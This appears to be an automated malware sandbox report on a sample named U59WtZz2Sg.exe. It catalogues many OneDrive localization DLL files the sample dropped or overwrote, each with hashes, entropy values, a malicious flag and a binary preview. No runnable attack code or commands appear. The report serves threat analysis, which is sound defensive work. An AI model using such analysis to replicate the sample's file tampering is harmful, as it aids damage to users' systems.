XUUR...=/....K.c.h..........M...w.>.p9.{2j.G;.N%.{.}...HCrw\KW.;....I=B..9s...9..^....2....5.Z..v..Pv.d..k.oGH_.9...".aVa....uh.Rp.K..0..&.A.....W^d..!.....Q.)..4..8V.G.ch(...aB..2{xu.x_~..*...+.......I..B\|..E31...Co.@.....Y.U...&...j;...p...i.)......;...!..r...m.0.)r.......Lv..+\|.o..k.\K6te1YGPnIbo4GcGOEP3iHx1cF

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\am-ET\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	146054
Entropy (8bit):	7.998815196907162
Encrypted:	true
SSDEEP:	3072:L0EHn0tDDdn/VJFPMNgAy6nLaWp8+zY4oWvRAnaK+QPnyAronaSct3V0GaosKU:XH4fdVPgvnLu+U8C+naztF0t/
MD5:	A704C322D4D8F1963DD88F9215FB504D
SHA1:	5321E12562A43012ED7801C6F244BD001EEE2F28
SHA-256:	7AD5FAB4CE7A583A60923A56AD1AF0ACE2395084572224680D5FF116C4B095C1
SHA-512:	0B8148BC243A3DB184D71A346A1011B57E2F7937F67EC3A5AAE2A78A8C9A7097E23A7F3F2112CFA34A60672EE025DB2D8BD94A56C0242D9D6E47F1E70D680C7D
Malicious:	true
Reputation:	unknown
Preview:	MZ.........}..6.x..3.%.W..u......k..+...0X.A...4.......3m...cT...m,.0s..e..,.0......6.:..../.=..R....9.p.m.......:N....GL.-..mi...._.[\..Ep._.{c/..w.B:..2.\.\|..%........~K.@.j.~O.\|...G..q...ck...ij&}.tg./.....'.<...q<.`...@......J.0............`A.j..`.So...,.P!8>.b.$4.k..@.2sq.}.....B.+.d..T.P......N.1..$y..B0....n.^..^..@c Y.!.......s.k..W.W#......K.D......?....Y.".i...e.kP.:..I.>c...>...k....c.L.%Tf[."A....2@#W?..[(..8wl...h7.b....G2..!..`).F.9/#9.e..8......y+f2h.z.b&q.......8.R...b^...Py...`....<u.f...."w.....@U. L...T..).....l.W[.)vf........=....{.x....F9....-...(.g.mN..R.dG..Oj.1... 3r..\}...Z8...VS.db.....&..........G....Y...............W.Tc.c...T.H..u..v.....y..4.L).P}..).L.....OXF....$.5.\|.=gR[~.........{s.\|...w....c%I+.~c.p.T.....L.hM.....5qQk5..N].;....#.j.....sW.$"......m@..-YG.#..F......S'>}$.:86..:9.9...."....a...$.D....p.......4.s=..... .y.<.h..1.A.,.B.P4.@B..]L.l..T{....4Z.J<1.eY..d\{.7[R..;..S.b..>.J0..W..B.N...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ar\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	176774
Entropy (8bit):	7.960010148497281
Encrypted:	false
SSDEEP:	3072:CHIAtdUcyY9VSRcfdEqCVrbTjrcHalnbT0RBAvtj5AEgr59GPn7Y93Qr:vKqifd92rbHQ6B04154bGPn7n
MD5:	8ED777D39477F84ABB196A2A9D281ADE
SHA1:	A469D4732F5F62D98DA8AC06E180EA31CA4959D9
SHA-256:	54748BA1520254338F41889CA5ED5B90B873B1879A9126FF332CDD77C3216204
SHA-512:	C986B6CC95DB64CE47D9989C4A694C0807761ED699D1129F693F365DFC27CD10B618CD67A619F686E389884987C344DE865B8F3FB4472EA26A309390ECDCA78B
Malicious:	false
Reputation:	unknown
Preview:	MZ...$..o".2..y\|.]ET....Qf.GP..,..../...j.?.5u....5T.pP#...W..A.....Ks+..Z..L...Yc..#.....:.....>d.]...,p#.....,kt. ....=.P....x...y..3.R:..d.D.e..du.c....K.2.SA....:.^<..r[.7...Xb..3.C..&f...oP....4.YGS.. o.......4..'...q!...1..^..h..n.I.r..:..R....'R.l.x......j.\|....Q....b....6...T../.......:.d...R^......sR.F3o}......7V..D..../..0..Pk...[z......y.._CN....v..2...8........7.#<....Z.x..\|..s.....g........].b...;./....%..r.o+.V..].....6...d.^.KL-....\.0v......[F....,D'......5K.....J.FZ.Mf.......t.-.wY...T.f..%Q....].1...u..GSf'...f...@.^.....$-RvW.0.....s..?...1.t.D6..v.f.]n"....U.........sH.......J....P.p....jd.W;....6.:...O....l...P......:.#{..q.1...9*.c.:.^v...L.O.S3:...W.g..........&.a.Kq..!..8.\.Ug.....k}.....5F{.2....#............)?..j.C...T.....N....M.{./..[BK.Q:.?l Oo.<..........q.7.............(..j.]vPy..t5....("vn....6^....A. .....E{T..X&.......sal...9..h..C..QV.K..B.i-k.v.H...D.Lo....P1u.V.e..Z...m.Q.d....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\as-IN\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	200830
Entropy (8bit):	7.758319403840583
Encrypted:	false
SSDEEP:	6144:StrlUum8swnoLYy3p3m+JTyu9cbIoH3M2teiW:SJOum8sioLRmsTyu6dW
MD5:	766D621E78F9A2237668F1DD297B5A3D
SHA1:	3E6E2B5B74C2FD12BB03E86BC1E52497FC47C9D7
SHA-256:	14900DA9C10CA49524FC09D98A953D162FEEFE4D8204EA1FAF83722907D6D7BD
SHA-512:	5AB60CDCCD8CE6C9CB09D6A34B9C0482D933FB1ECEF951129700CF8DEA9FC43360433B074120991F022C4755451AC739C005C05E8D2ED3C2107EC0A698BA4013
Malicious:	false
Reputation:	unknown
Preview:	MZ.....k.\|D4.....6.b..,.a.I..DG...t..zo..:.:....`.8A.0G.].....`.V.%......(...r......P...rpmq....-BsT...`kj....%...].h.M..I......r.J..2...xv.[;!.p..,.Y6..Af.o..6./....q(...D.@.....'..K>5m..?...I..4r...+Y..Ey...w7..!.Bg.....S....K./v.;:....s$.j..\..9$N.....}ZWm.V..2A.w.0.;QHt&.^v...M..M.Q-.J......>..3..D.,.R.."....;....]..T.s........?..;.<4F.....6...T.t..rv...R..46./.P..Ix.C......A......\..nS.......{OQ5..}......B...A...n.9.}u....J&......G..g.1.g..s..Vt.l...J.<WU.YRpR...8\...z.,.......`.37...<.....]....H.{.5x.....&...,.@9V..l..."l\|]....,...V..6.@......J...v..<...[".....sKs.D.-;.T....M..a..+.(.``........7...u...c/.Ps......#k.W@]`.....(.kE........[.o.>\|5.e.. 5B....}....a..]$O..P&x.@`9..2wO5. .a+.........>..n$.xj.&..%h.o.]Rg.0....f.....p.....'V....Vf.C.K=....O..i%.".3l..O.3.P...m....)..I....r.N.Y&....%2.W.e.,.E.Q.!....{K.......-.A...8.....m@.+4..X2....-...y..V....a.5.f.i.>........8.....+.B)i...\.<..&g...7..e.}2_..M._..Y].......

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\az-Latn-AZ\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	205446
Entropy (8bit):	7.673499729937124
Encrypted:	false
SSDEEP:	6144:rnHOJLrrnrrZwT96SJ3QDf3a2moKa9EtA:bO1reT9AfV1
MD5:	904747C89D15BCB906E9A11BAC27B312
SHA1:	09C0FDE5FEDBAA32B0D836BCE050313E2B06179B
SHA-256:	0114B9EF15A57DC40CB1198DEB821B29EFB7453C61E7D6B909A3D8F64942FD57
SHA-512:	459D84653CA7A2DC5AC170B1BB1D3DD3CD66086B714451261B6618F0E3AB90E942360B1B5C278ABB8E2F264EFFDDB6256F53069A8941DB924329236E4C64F981
Malicious:	false
Reputation:	unknown
Preview:	MZ.......27.;:...."U......]UL.o:jh.!A..@...d..8..O.B.C.<......n.6..E.+..W..a...hl.VZ..K...L.J. h.il.....Q..u_!K`.....}....V...O..b.........;...g.U.....i..0[6UU.Hg.....".Cn7K)..k@~...\...o.V....dk.1. .g......;.....d....._..Ej..J....>4/{s<..w..p..".2..m......1n%_.4.[..7qL...Ta@d=....y..5..V.3.$8....L.vp.b.;#r.G+.d.C.uI....N@.o.b.)n>..v.!........A\|F_..s.9..I...>.1<..c.....q..a.L....P.>.:...Xp...jIX...m7./..4.&Z...k.......$...z.9.Y..+..\|P .....N{...1...!.{4`_#P\|%M..............G._j.F...Q.hl.og-q.L...P...u.......&y?..c.fO<._=.n.....9.....o.... d.2..B........-..j.%.... ./;\...@..9......._.)....w..YY.....I.8 .....H.vT.%..W.RR]...1...n.....[..p"T.O~....9..5l.WMm.....$o.j.P..N4'T..et^..1s...2._j%.\|?.\cO...........H.x..[..h....6tt[.Ow;..,s..r..*.5W_..8...".......N...V.6(T.F.......2...d...../&."......@E.gmj..}l..J.(.......G...9.T......:.N.;.._.....n...%.u...,....T.@..Z.hU..q.<...5...T..!.....;.g....iv..7..y...@..8...@?.d.hQ.k0v....RX...Z+.....tn......

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\be\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	202374
Entropy (8bit):	7.733556603289859
Encrypted:	false
SSDEEP:	3072:MjXkuZLVxefoYQI+ALg8AaLNIzaKZUONnbF6l18AYiB3W2M:Mj1LVxefoJI+ASaizjZtNbFi18AYi0
MD5:	F45ACC4848AB3983EFC48B5E53562073
SHA1:	D797B45A34DCBB477041B2651DD5EA928E394964
SHA-256:	3B51FA6CCD4CDEC0645A4492D0B567498197931BE0C3A125377DDC7DDBEF1F39
SHA-512:	88C1A7B3F8B403354B8DDE1357BA3C15A2DC8D1D64805626CABC811D704FDA4FDDA96394002581D240AAF30F3EFC19C7B6A61A052A160316B61FC4D35B757BD9
Malicious:	false
Reputation:	unknown
Preview:	MZ....V5.E.j.......@?J...wv.o....`o.....l.........M.e..v)}-...5.....3.:V.....C:.].o..K.........@!.9...bg... ...[" p....A.6..A^U.+..Jb...g..%.}_..\|i.y...;s3..4&.%FA.b..G.gc.....7....8.D.....8/...QO..y:.`cUK..r.~..R...,..h.r.M..#K.)U..^s...n".3/c9...\|.a.B..Kn..p-..g!.v.:.....j.uw..'t.....i/.dC4....mp;C&.v....8.0;&..,...y./X\.ok......I.7..M.[!.....-...~..b...n...!f.=<..2O(\..$.....S..b.Gz........1t%.J.nT1.$.'.@.[h{..c....{..h.M!......\l.)....Ve..2$..6."....a.t..j.......T....S....!....i3.........x`.&2..~..>b....."..}...p/f.f......4.....<...m..7.....%.jE.5....,...-.......a...9.3.......D%_v.p."QD....)@..@....:.....v7g.[.%..........M(.....l.B.d......P.^:...u.K...D...Cn..!...n'+......2.[....).}..?..8..~,K.a.a.P..?j$q.&.....e. %AD qm.>n.wx.=.......x..W...,.../.....9...O...D..d..nw.#.5/.~.%%.G.W.+.M.N....*.<..~.p.WT..=...........G....r..{k..R..../..C.....!x.E...n.Q..xE}.;.....Q&='{k.O.=T..G'H..WX)..F.n".q.M..g..,.&<.j.d...A.....Em..=....\s.@Bc.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bg\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	207998
Entropy (8bit):	7.670252609256868
Encrypted:	false
SSDEEP:	3072:0XtznpH3dPEMqxVKBRBNIJvwN35Ya3kVlYjAcjcggxGd68h9et/QnWpV:itzNqGNIKx5IAPcR0zu
MD5:	055629E9CC5D2DAEFAC14E4C53CD1831
SHA1:	E6EC1A93AD10A53E42E8F8C536A8998A8F328663
SHA-256:	F3FDBB46CA5005518359206D5728A05438B83E74008712976684262419E14DCB
SHA-512:	E42FE2239CDE3B055FB21A16D9821F5C4950B58C17B71A1EA89C6A2AF51F6F1DA23B1B9614A7A84A530906B4A181ABCD4783E2F4F71ADA6D84627E5AA33D5D1B
Malicious:	false
Reputation:	unknown
Preview:	MZ.....\|.+..<...{.".;.......Z..7..D.h.0...0.S...2l..!Ho..`.C...k.U$..7.E!.}QhRq.+?wtC.7...0..t.t..3........[.5...E.......Q<.Z..&..Z......4R)\|.T.......w./.......B;{......m..c....2k...A...XODt..sw..B...W.S...;.)...Z./.._..?..B.~....Y}......q..6...Z..}...QNi.....\.......C%........m..I8 ...........6Q#..z.\|..+.rFr..?.........q.?...#h.............,..#.4..........L.UCA.t%lO...QO..=l.,.>X~....3'aa5M.2D.%...:..p...........n.L..^..v..~.......s}......u.r.{.^.....<.g..`.PP..Hr..\^w.......J...3......KrVs..5..`....-....z..5...kI....j..6.t..W..SX......)..!._.uJ.'.}.\|.7w..gs..s6O.....m.V:u..,...u~.`.....}.....n!.B....S........u.2...."......RJ#..`{....Oni...X....<.....y.....!....5.wf.E.[.7..ZiB.)....i.x.]..8.....D...0t.y....V.u}...a...i.).......(.M...V.[..g9.V.n..N(x.!...1?w.M...(.;.d2....(.D.65+]U%.C..C.7._......#;c....o.#s....o...........x....rx.L,..c%.N.`.....y]@\|.b....-.\|.:..F.v....q....u...6.#K ...H.1t(.LxlM...*q......N...=.C...P.5]..2/..s~...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-BD\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	202878
Entropy (8bit):	7.740481656920732
Encrypted:	false
SSDEEP:	3072:bgJybmUzn/BcUYDB7I1xyK2omuCvWevM1UtMlBEh6gPBfGhQWInX+N3uC:bh/BcUYF7IUvWevuMo46cfJnguC
MD5:	437B0ACCE18B64E78BB99586AB9B14BE
SHA1:	5578B26B21EC4081654982768BD9B264E388EC7E
SHA-256:	4A42DA0A92CEA1C58002FF4CC5CC5D69E675B0A095CD17D7B8C81C9ED75A210A
SHA-512:	85117505698DF869F1B2D653A09FC2DDFCDB914D108B1073AF946579D75D43AE5A1D9401C067B3F34DCF448ADBC0F04F6D507F9A7734F1DB3505F56F43E563DF
Malicious:	false
Reputation:	unknown
Preview:	MZ...3S_.W'.).....P......Gf....JE06Y.dUv....P.8;.y{....N.....Z6D....H.....n..H...A.%..O.......&.`......ZJ9..A..$W.k.#.Q......... ....W.a..+:)&ci.<P.F.H..o.c......i...b.........W.of.z..2.U.`7...2..'..}t.Z$n.......m.2O....0.........-ERG.t...n:...`..ohn.;.W\|.m<.?...V..o...Wd.y...9.....\.kb.I4...W0@......J.._....k...:.x.D../.P..q.v[x">%s.eY............A...........].k...p.g...A....&V..$...y.dz.MJ8.E!9....^..XM...Fc......f!M.M.LQ81.D..9 ..7..#...xB\5NwFV...9...qH..\.?.J....E&........{..\|..C...UBQl:..=Uuy..@...(....cy."r./z.A.!m......k..0LQ....S_n.e..?...3...._.............g&.I0..,.Q....v.C.X.S...2$F.....\|......EU.....$...tB...7...mL...+O...t?....@..L....rp..Z....c..0...q0.H#F..$.\|........[...-&....c.....-..~..[9q...$06P...$-^.jb.5..1d.?...6..W..t.Kf....g....'cr.S...........]-i..=..4[s.[?..\|.;... E.j......\.P.]...2..\|..D.O1.=.?.!..1eAm.3.=.1..w.[;..S1Nu.br...Y8.0.........}9-.Zj....*4...\..'"..F..1Q...m.H.XiK......=..#8.:...3\|.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-IN\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	202374
Entropy (8bit):	7.742981697970552
Encrypted:	false
SSDEEP:	3072:4w8Os0if3PoOPJXb7iEzsao1xEU1Nq/QwgQsDX2emQ/Sc7Y4:4wa33Pp7iEzsaoQU1Nq/QwV+XWQ7
MD5:	8F3FC19704E361BF4A56D3DAA4135491
SHA1:	46A76613B4F05EBA9F2B001C9D8A1A8395493F3C
SHA-256:	8997F4ABC5D8ACBBBD98B64E66902F3B18936EF368B0A076625B9E1FEC1E558B
SHA-512:	2C533173A51B27FDA94EA40DA006B50CF9731D6F8301424DEB7A3FC8DB112528C009575860DA23CF76B80639E015B7F074A4E681ACD2B4605A514F7889F67AA8
Malicious:	false
Reputation:	unknown
Preview:	MZ....&.)...&.J:.....7.$....h....j3+..O.....M.._ph.J.H.N.y&i..I..5...w.$U....-.O...0x..6/.wt.....G"`?U.tl......O.~#s..n........^.K.....u.......A..e....v.....Sq.Q.....{z.7x5.....n.^...d.N..>.L.0..............>.j....;z4 ..#~A.y...<..-..6LR!..nj.$_g'4..HL..%6Z.4.+....."..rey..u_.Fd..Dd.L-..........]....m..5.x.K.2..0.[.#c...^r..R<.8.E...Tl.ll..D.#Q......{...K.%.=..<-.pT.Q..:)...8.[G............gj....A....a...:....E..$..f+).]}.....9..G._]..\|p..`.LJ}.&.Eq...x.W#.p........~.....d.........:.;....B....0.B.a.X.]..u..Ew.q..%_.#..Ze...NK.1%W%k..-D.@<....7SF4h3P...r....{..m....&rp%.i.%"......J...MZ.T..[......#z..d..KQZ...._...aH.. ?..X.(I.G..f1.......1.P..l~>M\|...8...'M...8.QmU..}..@......\...g@3...5...JU...v....@B...k.8.2\|...N.5c..fx..z..S.8j....B....N....Gy.3&...$...Fm.d.3}.w...v2,.....\.=.Y....7..xa...{...<s.... ...X....H. .W.(a.?.j...P....>..E......t.. .s...9sJ.. cYt.`..............2.kQ't.[.t.o6q...&.h.#B..!......s...r8.C.c....GlB...z.4.......EWNA

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bs-Latn-BA\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	208518
Entropy (8bit):	7.601531574943543
Encrypted:	false
SSDEEP:	3072:NSLcwhok2XM2nNTQEGvQkPkAMizMm7MUxJFPGG3ujO69B0j304Z0sC:N2cwhok6nKEjkPkZOMmgUP93ujBO04u
MD5:	16E24D1F83174308EA3899C9E3AF3F9F
SHA1:	103623B991F7D8CEF3169709698090A09379F1FC
SHA-256:	53123EFF55711C3FAD463EEF790E896BDBC33CB030584E51408D887224AA3843
SHA-512:	2E202D522808369EE3BCCD2C789C3B0E40126BEFD2C55BB28F00B5245CD984827A8C750FE5E16F398B6B02FC78AF7CDEC10FE1174CDD61A2EE02AF40412A5D14
Malicious:	false
Reputation:	unknown
Preview:	MZ....jc..Lpx..u.Hw.lY..9.E..V.c8.o.C.n.?xW......\|H.E.....#E6...AC.9.w..G..../4._.....a:..g...<W.T.>z....).KRg.Jl..oP.U{4D...L./.'I...[>..2.\|Z3..d...E...?._.+.!...:.7m_j...H..+..zb..I......$`@.3,F{.....@w.....e...MU.1.n.eA..:........Hw...{N.1..:~..D...@.......>..'2w.L........S.....{..`..u..y.s..%.....we.6$.1......".-.31X..Q.0.._8..m>9.....y\|.........q...6".....@.+.....t.$./.cM.....r.mE.........E.&lk..m..._xf..!.P...X...x."Z.8E....(. .V...V.d.3.P....O,:=.....\.e.....z..^a..bq.b`.x..M..&...y"WS. )......?.c.]#...S...0-./iEV.......1..oO.d....&........u..l..6l\.j.M.Z.8...=..WD.....p.GD.?'7...I0......."...U.(:......<.'...\|0N;..T...uo.....=.p..........H....v.x..#..,.=H.G..Qj.~..'wF.%l.;...!.Hg.....Vk.ZfmT.z.-.FCmmH.6.3P..`...=z...]..Hc.F.......\.K!N..n:..0...lW$G..yD..mn/.k.H.7...w..}.../\..g4...c.#r.lnda....-...Ri....W.O.....@...SyU...RB.v.......l%..h.[.wEZ....\I..f.Z>...>.... .=.......y...{N..Y..fj.n.4..._..`.f!3p.:........TL..ee.).

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca-Es-VALENCIA\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	215678
Entropy (8bit):	7.507712946397814
Encrypted:	false
SSDEEP:	3072:R3Aw502KfJrnSBIkG1Bm5GE1IDzhTYp7ur0tP08E:R3z62Kf5JsGZG7f4
MD5:	8335D0A291DFBDD693C59AD9033C95EC
SHA1:	CA130FDBC55C1872CA87CA8A057EED0B3661FA3D
SHA-256:	CC3081B57C26BE0F922D6DD14170B18CCEC64D7E5B4F38860816C08A7A5ADCFD
SHA-512:	D28C13FEB3836042B4D71ADB5E57F7CEDFAA4699A10DA0549E2B8B95F97BE2CD0D8EA2D924E1BF13B16D88D0AE97680F236C46F94CDF9F535D3EE48C57E08BE2
Malicious:	false
Reputation:	unknown
Preview:	MZ...<;...5...Y$...,......:._....v.L"je.[../.-...l.i.G...:..a......F.D...%a...6_.>...:.-Q.>....7@.BM.%......^A+...TN....\|[..X.F....i.B.[.S4..?S...n...4C...z.........iLXsP.(5..Z....iZ.e.q g/!....qU.m......B....._." .A...Tm=\...'......m'....b...h.....,P.S..w..5...J..E....Q..g..8...M...m..FG...$...r/R....P]-......GO......\pg.A.}6.Au..vwo....^...A]]m...y.....a..@.[....=..e.`.UE.+/..5T.(..uL.....HR=(...>...../sz&4I.y..#........@.............:.E0..ir0..Pyz.(..c..<..v...u.t,v.t....{.t.ZO0`.........!lq.Ff..l..3q...c./.V...:..U.W.@..qQ.oaA.$.=G..&...j...Z.w1"... -7d....U7.Zi.>...cT..H:c...;n[...s.k[+..d!........E..oBc.b...5...w.]}8..?...p..Sn...br...(....\.W..[...xX...7...-.t...r.I..tF+S>6B...i.....d.g...=e\|.2...DA...j.)..6...D.h8W.0..:Z...@(..f4....:..7...3.......4....2.......FO.a...U...o..1...P......k.....HO.:.Ez....=...,._...._......F<>`.H.'....].>.5ztF.v!.nj..T..u.6..j(..........0...C....]G..6..iiNj.aOBN\.EQ..\|.....G..L...r2.[u.+-....S BO..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ca\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	215982
Entropy (8bit):	7.498300355516672
Encrypted:	false
SSDEEP:	6144:LnL++oLYRTn7rde7WAN/FCvxuSd2fqJwN:GjL35FC5v0N
MD5:	026E7E362E86F37824DAC42ECEC9D8A4
SHA1:	EEE9F3166EF0DF5CDFB3C87B1736FBB6FD63BF60
SHA-256:	7E61E9409DE007EBE4E6755C09A6D8BA35CED5EF8DB033F6549ABB66423604CB
SHA-512:	21723EFABC75A34CB8F0408041B1D5C0F2C2EBEA44E4D4E3D67E9EFBD85B67E07A1C058E109A08A65D803F05E6F40365DA8B60FE2AA86AB91ABC754CF6FA6BCC
Malicious:	false
Reputation:	unknown
Preview:	MZ......qle...NI.;..#u#......b,...X...mM.f.s.v.{.D..eaU.37.... ....\|...d=.1.=.t....m."..ml..%7.TNEQ...........J.@ZWdd....1.........<t..d.gP.Mx.`3j`V..u.B.~....o...qk.%l2..6..Qc...ew....,\......O.......>.r..Y...H..............i..-.tJw.).U..fs....m.s.....o.p........K.N<.M...H.#/....g:o:.C.d.N9.`....>.:qbVu..\..\..q._jY.I.$.....N......X.....+xw..;..#6.y}.VO...:.....2 .6w..;...~..;8..4..._.EKhG.Y..m`..V.....7L. ..A....+^...q..1u..g...k.n...s..`.c.N.]d.6I..2m.4#u@....!...HR.Q...9..$..iKT....DW?......M.e.J..Q.HdG...f.=..R$.....7n...hk..p...X..6\.6L#E.....4v../..[.N..tC.~..,.j....L)aX...Sh.'.\|8..~[~8..S&.k......:.n..Y..g~k..1...S.S6-......$.Z.)...S.G..w...`.Z.n..R[.L..e.J....h..+...U....X....Rin.'eI.....4...\.~.u.]a......'.........^.....x.9...}..^\|X[.XO........Ag.&.,M......;.5w..Ya..r..z...a}..s}K..<..wJ.}.:..eK...3...9..Q...5r... :0.`.....2....n7]b....j2....s..^I.@c&=.t..2...c.....z[....Ko....rV.Cn..e..x.-d ..\|...5z..s.-<et.r.J C...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cs\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	200326
Entropy (8bit):	7.709692495613755
Encrypted:	false
SSDEEP:	3072:/qTEu0s8bv6fDTFPd69+fxLJzUxcAmpCD66qtR9y3ms3JxTwJoHkbEhcHpj:/qTEXs8z6F11YBmpC9MR9y3t3HTwp
MD5:	E8316DBE93AC713B1DF8A6C4608945CC
SHA1:	BB19DAF44BB015A54C34B8FF16CCAA3ECA51B71F
SHA-256:	BABC0D16C77371595A9D1D58AAFE955A3E76A43DF15F90AD43EAF170C65B6C4E
SHA-512:	3A289439B4975DA937830CF5A7622D128960E80ED6BB5FAEE6A04C7BFAC0690114DEC34A91CB884D665AC0F954D7B3A8E75A2446DB089F45C799018BC8C0E3B2
Malicious:	false
Reputation:	unknown
Preview:	MZ......oVJH.^...Os..9......[.......>..9.t.N_o'..9.3.w...&Z..cXp7..X.>.6a...r...Gm.Q..u..Uv0x....J...U-...]X.9j.w..EH9....$.....)M..p.{G.:..\..>.V.,..HA.......A/..z..C....4@ .j6uq.......j.....J...4.....Wwt.).e...`T.`..E.S.r.....R.ld.........<.(...>.....#...r.B...n...v..... g.2..+...%...]~.T.!......M3...l\;.\|..N-...[.N...?8.02....f....s..`.3.Uj.oD.6.^.;......q1..e....i.\|3......vE..A.}0..Z(..-.i..C5.t... ns..gZ:w7a.'.y...C.#.i{........5~.'I..)=..UP..K.EO.&.]^.&...B.ZXQ.bI.d.j.s......ga..m./......q....C.....Q.]..9..9...b#^M2...?....l.v....e$.[.8u....c.....W.....$3u..._.......!.&Ak/..)..1.........{.7....i..y......Jm..T....y.a..y6........Y..`...t.\|..d2..KKg.R..9.)..!Ao..(%`....E...[.X.X...7.77.J.X.Q7.....+...C.R=..Xb......"..m.[.g..aj..l...9.!..:.....}..h.....R.%.^........svt....9..<V33tg.......:-...(m.aM.p.....Z.[........H......%.P>..*].W7-......>-......$..J. .....y?!.;d.lR..K-\|.t.6e.p.?...p.071.d..9.n....C.........7P....._...._..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cy-GB\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	207278
Entropy (8bit):	7.604966547399449
Encrypted:	false
SSDEEP:	3072:128iZbgWs5p3HZe4FjR6ndpmxgmqbJysZkazI/CJm/H7E2FayCh0mUedYG6xkvvt:1OWp3HN9R6Qqg+kaNk/H7E26pl
MD5:	1CC0443687E7667B911F0D56A5EF3BFB
SHA1:	B2A17837A0A072AAF7430C359123E306C8700D89
SHA-256:	E4EA59355CF6D5185B144B007D5F32501B0C6FB71B97A5E72C2B8982F2DD2EC2
SHA-512:	EB2F7B4964B675FC1F20DC5D1095239B5D623F86D0E12A35C70B1368296CB8AABF669079DDD22EE78F2C27B0ADD37DA4E12DEB6D66C2BA98BCA7963373FDDFA1
Malicious:	false
Reputation:	unknown
Preview:	MZ...K....<..\>.......:.xoY..F....P.W~.`.C.........Qw.........E....t&....N.......Y3..f..U.@yeC...^....B..X..C..+.Q...z9X.M,w.?...d..]...Vv~..C...F..]E.._.n..\.........Y..=Dgg.a...7....B..d.B..z..[....,.~[...B.).)..}..1>.k/..j......}...C.p/...=.......J....:.>....E.;.I..QvN.......[...(>.........,..!...........u....d..I.....J.IOh9'go...\..J^7.Jq...F......"...\|....b...T.c.@....T.VC..aAg...._....pp.#t.70b.jw!$....\x.,s....m.r..!&...kI..&.V.>Nh........h.....tw4G.......N...I.]ov;.........V..?..[..I.2u/$.S......g...{$...J...a)R...;..a(pdE..sy}..^J...Su...O...s.'....b...+U...;._.a..\|..:...`B.u..-...........7P...;6..=....`...=d.,.i..O .......TAa...T...!....a.....!.....a.+6.a...pq..^V..........m+.'=....[6Sx..~.'.....Ap.9.....C..X.B.u.E.<.B...YM,........E..,.......G....N.oTV....}..D.$..S.E.z`rZ.O....].e............]'.4...!n.....<...jMJS..c9...v.4....."MG..S.l..#.@`%.....G..O.b....[/.\C,.\|t.O...6........C+..&.......\|.+gQ.aDG&..E;(..A.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\da\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	197246
Entropy (8bit):	7.725854731932469
Encrypted:	false
SSDEEP:	3072:Iv1M529aK4q4PuyDQBxpk1N8Q541QOcfOIvzquJWkjhJaDJocNO5VaDS/xnS:Ivi5maKpEuyaSX8UzOcfrv26J9+n
MD5:	AD4FAD6C6ED72AA46853D6A33C87A3B5
SHA1:	4C71CED1C545B7716AB8F9955245B7970C65A62D
SHA-256:	50FFDEAAFB694E8174A047B179414213BEDCEA4A8D5D711FDFB6C410EFF616E4
SHA-512:	F6D0E235947C18C866B05AE9E893048ABB75A5037942F91339BEE50DC5B06DE14B7AE08F52C01E14B31567165FAE1D796628CE817E28D5BFCFC6686F940BF4AC
Malicious:	false
Reputation:	unknown
